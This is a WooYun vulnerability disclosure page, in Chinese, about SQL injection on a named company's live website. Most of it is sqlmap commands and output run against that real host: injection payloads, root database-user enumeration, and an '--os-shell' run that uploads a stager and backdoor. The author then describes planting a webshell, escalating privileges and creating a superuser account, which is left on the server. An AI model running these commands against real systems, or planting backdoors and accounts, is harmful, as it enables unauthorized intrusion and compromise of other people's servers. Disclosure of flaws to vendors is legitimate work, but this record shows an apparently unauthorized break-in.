当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156735

漏洞标题:任子行某漏洞导致Getshell

相关厂商:任子行网络技术股份有限公司

漏洞作者: 路人甲

提交时间:2015-11-30 11:12

修复时间:2015-12-05 11:14

公开时间:2015-12-05 11:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-12-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

上次友情检测出,多处SQL注入漏洞,并且是root权限,竟然被忽略了,我也只能呵呵了!
这次就讲讲攻陷服务器吧!

详细说明:

这次就以一处SQL注入为例吧

http://www.1218.com.cn/index.php/product?id=23


不扯其他的了,直接进主题!

漏洞证明:

首先看下权限:

sqlmap.py -u "http://www.1218.com.cn/index.php/product?id=23" --password
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 04:26:22
[04:26:23] [INFO] using 'E:\Python27\sqlmap\output\www.1218.com.cn\session' as session file
[04:26:23] [INFO] resuming injection data from session file
[04:26:23] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[04:26:23] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=23' AND 4645=4645 AND 'SUds'='SUds
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=23' AND SLEEP(5) AND 'xrKF'='xrKF
---
[04:26:23] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL 5.0.11
[04:26:23] [INFO] fetching database users password hashes
[04:26:23] [INFO] fetching database users
[04:26:23] [INFO] fetching number of database users
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 4
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 'root'@'localhost'
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 'root'@'127.0.0.1'
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 'root'@'::1'
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': ''@'localhost'
[04:26:23] [INFO] fetching number of password hashes for user 'root'
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 1
[04:26:23] [INFO] fetching password hashes for user 'root'
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': *-----------------直接root权限,密码用不着----------------------
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] root [1]:
    password hash:-----------------直接root权限,密码用不着----------------------
[04:26:26] [INFO] Fetched data logged to text files under 'E:\Python27\sqlmap\output\www.1218.com.cn'
[*] shutting down at: 04:26:26


来个最简单暴力的,不找上传点了,不然还得破解用户名、密码(麻烦);
直接创造个上传点

sqlmap.py -u "http://www.1218.com.cn/index.php/product?id=23" --os-shell
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 04:35:14
[04:35:14] [INFO] using 'E:\Python27\sqlmap\output\www.1218.com.cn\session' as session file
[04:35:14] [INFO] resuming injection data from session file
[04:35:14] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[04:35:14] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=23' AND 4645=4645 AND 'SUds'='SUds
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=23' AND SLEEP(5) AND 'xrKF'='xrKF
---
[04:35:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL 5.0.11
[04:35:15] [INFO] going to use a web backdoor for command prompt
[04:35:15] [INFO] fingerprinting the back-end DBMS operating system
[04:35:16] [INFO] the back-end DBMS operating system is Windows
[04:35:16] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] PHP
[4] JSP
> 3
[04:35:19] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: E:/wamp/www
[04:35:23] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [Enter for None]:
[04:35:25] [INFO] the file stager has been successfully uploaded on 'E:/wamp/www' ('http://www.1218.com.cn:80/tmpudvwl.php')
[04:35:26] [INFO] the backdoor has probably been successfully uploaded on 'E:/wamp/www', go with your browser to 'http://www.1218.com.cn:80//tmpbcafg.php' and enjoy it!
[04:35:26] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>


上传点出现了

http://www.1218.com.cn/tmpudvwl.php


2.png


然后上传webshell

3.png


接下来提权,增加超级用户

4.png


5.png


6.png


7.png


好了,服务器到手了!
就这样,希望能够引起贵公司的重视!
PS:Webshell已删,上传点已删!新建的管理员账号,留个证据吧,请管理员自删!

修复方案:

(上次提交贵公司的漏洞被忽略,好伤心--)
还是那句,安全的重要性,你们比我懂,我只是个小白!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-05 11:14

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评价